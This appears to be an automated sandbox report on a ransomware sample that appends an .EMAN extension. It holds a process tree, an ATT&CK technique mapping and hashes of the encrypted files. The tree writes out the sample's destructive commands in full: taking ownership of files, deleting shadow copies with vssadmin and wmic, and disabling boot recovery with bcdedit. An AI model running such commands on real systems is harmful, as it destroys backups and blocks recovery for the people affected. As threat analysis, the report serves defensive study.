  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin""
  2⤵
  PID:10208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin" /E /G Admin:F /C
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin"
    3⤵
    PID:5444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000072.bin" -nobanner
    3⤵
    PID:6592
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000072.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:3584
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin""
  2⤵
  PID:464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin" /E /G Admin:F /C
    3⤵
    PID:8668
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin"
    3⤵
    PID:7124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000007C.bin" -nobanner
    3⤵
    PID:5448
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000007C.bin" -nobanner
      4⤵
      PID:7808
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin""
  2⤵
  PID:1208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin" /E /G Admin:F /C
    3⤵
    PID:8548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin"
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000007M.bin" -nobanner
    3⤵
    PID:8780
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000007M.bin" -nobanner
      4⤵
      PID:7472
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin""
  2⤵
  PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin" /E /G Admin:F /C
    3⤵
    PID:680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin"
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000008L.bin" -nobanner
    3⤵
    PID:2656
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000008L.bin" -nobanner
      4⤵
      PID:3892
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin""
  2⤵
  PID:7588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin" /E /G Admin:F /C
    3⤵
    PID:6524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin"
    3⤵
    - Modifies file permissions
    PID:8084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000091.bin" -nobanner
    3⤵
    PID:3060
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000091.bin" -nobanner
      4⤵
      PID:4672
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin""
  2⤵
  PID:5392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin" /E /G Admin:F /C
    3⤵
    PID:6188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin"
    3⤵
    - Modifies file permissions
    PID:1388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000009M.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4252
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000009M.bin" -nobanner
      4⤵
      PID:5112
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin""
  2⤵
  PID:6212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin" /E /G Admin:F /C
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin"
    3⤵
    PID:9212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000A7.bin" -nobanner
    3⤵
    PID:4184
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000A7.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:5624
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7388
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:8212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:6356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    PID:5416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:5368
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:9180
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin""
  2⤵
  PID:2264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin" /E /G Admin:F /C
    3⤵
    PID:7136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin"
    3⤵
    PID:6440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000006.bin" -nobanner
    3⤵
    PID:9156
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000006.bin" -nobanner
      4⤵
      PID:7892
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin""
  2⤵
  PID:6396
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000J.bin" -nobanner
    3⤵
    PID:3056
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000J.bin" -nobanner
      4⤵
      PID:5940
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin""
  2⤵
  PID:772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin" /E /G Admin:F /C
    3⤵
    PID:6520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin"
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000U.bin" -nobanner
    3⤵
    PID:3032
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000U.bin" -nobanner
      4⤵
      PID:8240
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin""
  2⤵
  PID:6516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin"
    3⤵
    PID:7284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000018.bin" -nobanner
    3⤵
    PID:9200
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000018.bin" -nobanner
      4⤵
      PID:6928
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin""
  2⤵
  PID:3588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin" /E /G Admin:F /C
    3⤵
    PID:8616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin"
    3⤵
    PID:7888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000052.bin" -nobanner
    3⤵
    PID:7288
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000052.bin" -nobanner
      4⤵
      PID:6632
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin""
  2⤵
  PID:7160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C
    3⤵
    PID:6896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"
    3⤵
    PID:2068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000004.bin" -nobanner
    3⤵
    PID:6128
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000004.bin" -nobanner
      4⤵
      PID:7076
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin""
  2⤵
  PID:7060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C
    3⤵
    PID:6948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"
    3⤵
    - Modifies file permissions
    PID:8032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000H.bin" -nobanner
    3⤵
    PID:892
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000H.bin" -nobanner
      4⤵
      PID:2932
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin""
  2⤵
  PID:4128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C
    3⤵
    PID:700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"
    3⤵
    - Modifies file permissions
    PID:8380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000S.bin" -nobanner
    3⤵
    PID:7212
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000S.bin" -nobanner
      4⤵
      PID:5676
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin""
  2⤵
  PID:5724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"
    3⤵
    - Modifies file permissions
    PID:744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000016.bin" -nobanner
    3⤵
    PID:5404
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000016.bin" -nobanner
      4⤵
      PID:300
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin""
  2⤵
  PID:5732

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\FDxQbIBe.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:8832
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:7680
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:7796
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:7864
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:3972

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\Crashpad\#README_EMAN#.rtf

Filesize
8KB

MD5
aea850955f73fe2e7cc2d90d819f811c

SHA1
13b88800a7482dd87ee67da9863a031a938b133a

SHA256
3044af5d48f513fd696fe3779d6dfffd8a21d35af243d31ea2e776b359e6bf9c

SHA512
9b88adfc39e889b3e65691b9ab46d52a85894922efcfbb47967bba43eb633a67d700612f4316b6a6045c9c1a10a785196b29d0d635a2f32d4ff0fd24c6784df0

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Extensions\[[email protected]].nAtIsXha-El3e3xZu.EMAN

Filesize
1KB

MD5
509561a8ee19a0299d86961dcf93285a

SHA1
bc74a100c89fcb4be84243eb9b8794b273ca1ca8

SHA256
e03a6874c382f8f1a8167da1a632913ee698ae7e992b57c18b3c11dd35b29795

SHA512
6f925a3d83b0ad6504794b656eb3e45c42733134edecdd550eee732ce3cbe5f96df592d2138bb4d3fec3604ec2ce14a3c5fbc3d48945e755e2695771356696aa

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\[[email protected]].H3Y5HQTQ-fp6NcysP.EMAN

Filesize
1.1MB

MD5
9c4e7643334cd24af3b520f968193bef

SHA1
4dfbc16521a87b3e582e3dfae2c3f36ea8362332

SHA256
0940e58dd4cf37ecd180905a65ab3b1541d85c4c9987081f01558b2bb6b08979

SHA512
d4e1fc981885ed90d00495910522e67176262d39fa481936cbcf5382d85708f51f3eda7359aaf10586151c59b202477b2be8fb67f7ff7e094cd3a429620299b2

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\[[email protected]].IsbSuxL3-OxxffSMp.EMAN

Filesize
2.0MB

MD5
1bba7625d3e70f91b52cacdbdbb14543

SHA1
ea9858c414b7064ada6c07acb360b8fd3484d8e7

SHA256
fcf929bdb8f9504a7a8b2ca5451a76d7c84e43e880e7781b37ab6f080746dcce

SHA512
34b859cf2be94b4fc654e59f4b8ea469b43fbbd8503665c2e938e841c87ec48e8dad552d428b592170a2989da1fe21a908cded9c1be86317b03ad4be0faa2540

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\[[email protected]].QK3POvmm-xDTkZIxo.EMAN

Filesize
2.5MB

MD5
96432a27ff2187c998a6f0ac3d8cceda

SHA1
36e32ca8a03a92a9e6ae51b7a43c8e185f4a744a

SHA256
5d1fa01560582c61ad172c8b8a63f212d8ed705c17da98e87fed5fc1cdde0b16

SHA512
6b6316430eb1d5fa22cc105dc26a73903bf9910687d2e51945b115c7b1a15bba59c2f94bda29928b176531b924f50e0d567393d1efa948309d809f3a826ee66f

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\[[email protected]].UoZucMOj-EIMphLHF.EMAN

Filesize
1.1MB

MD5
86a3d95b2d87fbb81bbed34e9bcb6ead

SHA1
9f854f292046cf2bc29377029cb5f412bc822076

SHA256
6b21db6b18cf1326a031e94ad1de5e69a1c9b011b796c1a155a6f121d20ae96e

SHA512
fd0165d47f0c82eedbce013662edefd37e0cdbe1a1cc4e1554ffbe8c96f693ef6fc71ab7b1a9d44cda6339acb403049473a4ea711e396d6a8c2b0cf9c8296210

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\[[email protected]].VPYagy4e-gWgaO0K8.EMAN

Filesize
2.1MB

MD5
d4fed9c5c8a191dfa994cbad8c489831

SHA1
0540a7b287cd572bdff2249e91def4a03d9da578

SHA256
3596ce08ec305789a7933faf92ebdf0ecad12840766ac2bdb0bf30c24d25df0f

SHA512
50117bfd5a3ce4642b007c5f89773fe861fea27ce6fadf589a9cc97a22fdc8de145a07868ab966ec8a02268b22859855287bf9392416ffb11c211c846da44603

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\[[email protected]].d4SgkWs6-g8PE1Ll0.EMAN

Filesize
887KB

MD5
7c5c45e2583bcb0681c2f2b6a50d80c7

SHA1
1f6a7fcdb658793c1186b5f89204788ba781b4b9

SHA256
1601d6ad57411c57793681ad9aab89a2ad4938a1c9203c48bbdefc664aba8b3b

SHA512
0d70a43aad6256ae21a50d3e3f38d2dd5ce9152eed3284c299dbabd49e126713cc295f4e712499480c956dbf9fd62a7c89bade90406c7827e182f3d3a2fc2cb7

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\[[email protected]].mTqICMM3-4Z5U1J1J.EMAN

Filesize
1.1MB

MD5
ac774c65a4d7abb80388945569241394

SHA1
8f2e79e5232d347bd78a9164a2984958ced8ee66

SHA256
635afd76955e02471dcbeda10e38c30cef71a84a9e8f72a4df12a892b3f57b40

SHA512
76c8a2a6ff9b7b2e42c82d2769deac30a50f5994b182a90dcf0adce223bec266d0131aed214f8e6163bb41846af55944724b0d71dcf6bf41e3b271b89930d0fd

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\[[email protected]].rzHdFGZt-xDcv99Md.EMAN

Filesize
1.1MB

MD5
ce66aa2069ac62aa3b06a22fdfadd5e2

SHA1
22ec7697f7053e330251c666d695ac7d5efdaa7f

SHA256
49654a9b44f1fe0d965ef7bca0b1df0f42d1615c0d415d7208a6e4a53b9ee567

SHA512
dfb56b2d519df4c77e4c16af44ef4990ca59d74d30abd9f2b8ce822d33c0b52e70053946277e69909a21abb54d57a6148a50f24b84ac346edf6086eabdbcd2a7

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\[[email protected]].xGHeY4KQ-xT5WUXdn.EMAN

Filesize
1.1MB

MD5
14d9aae23bd1599b35ecb05ef58df3b0

SHA1
f50c4d13e7db4f9dcc843c2affdeba223de96fa8

SHA256
50cc162fe54e7e7691e54f7bd8a171ea87fba9737e876b4331de7a113693c476

SHA512
c9d16d66ed6c4a732b02c2598f2e3f6a14dd6b137ba12d743ccd2c8b4651140332633a7984489d3bac9e112d7d6a191c3705306a8dc80455db0625d891fcf976

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\gd.pak

Filesize
1.2MB

MD5
35f95b99d94b97dedc556fa81454dc10

SHA1
17eb83872be48ed4a76c2bed534da62ba973b0e0

SHA256
a84a2810b639e82b6da161aadcc22cf18ab6eb2a4ec847f9f6f6f3fb10398b8e

SHA512
9f422e6107b4c159f53650526c9a4a2d52c0a2bab3d307de1b8673d0ce5a7dda04eb98db34c7c2798b275826b3bc61bf07e4060c2415398466af439a92e2ab5d

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\lv.pak

Filesize
1.1MB

MD5
4f0bc06d3ac264e59ee06e6ebb736dc2

SHA1
9dfd3a2d9627b7bfa4b3a509cbde104249123228

SHA256
dc2046476ae484ec7884ac7333f9a8da3c812ac8c14070e5de852d6cb81ce19b

SHA512
1e2af6893d9ebb5c4cee80ef178d27561df98d4aa1c2a3de002a6c6bfee19ad9b46642f70fc3149e6b1091c5f65008a4f78e3d8284e5b2f3c961a387a8d07e56

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\sl.pak

Filesize
1.1MB

MD5
c1ccc9da4922dc1f70eed128497cc3ac

SHA1
e2b4a9b84367a296e939c05d9abd6de9869f4cbb

SHA256
ba7852d09dafb20db7e471e00dfd20e3aabd130cf0759abae9860c65f5b0476a

SHA512
a5a02c8ce385637d4e32ce8ebb3706c40076b089470fb08465b007819b196545056e0c0aada172e24718216ad9c5d5b6df1237c578be2985e153302f22736df9

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Trust Protection Lists\Mu\[[email protected]].06m15NFM-nD5f3EDn.EMAN

Filesize
8KB

MD5
54ee20ea3db2ad16520ab2bbfdbda845

SHA1
dd1a2fb8db2f02383736fac25a998ead0101618e

SHA256
7b73ca95e465cefd239950e74e90ff8e05838228ac8a2f3436c0a14e3d5fe33e

SHA512
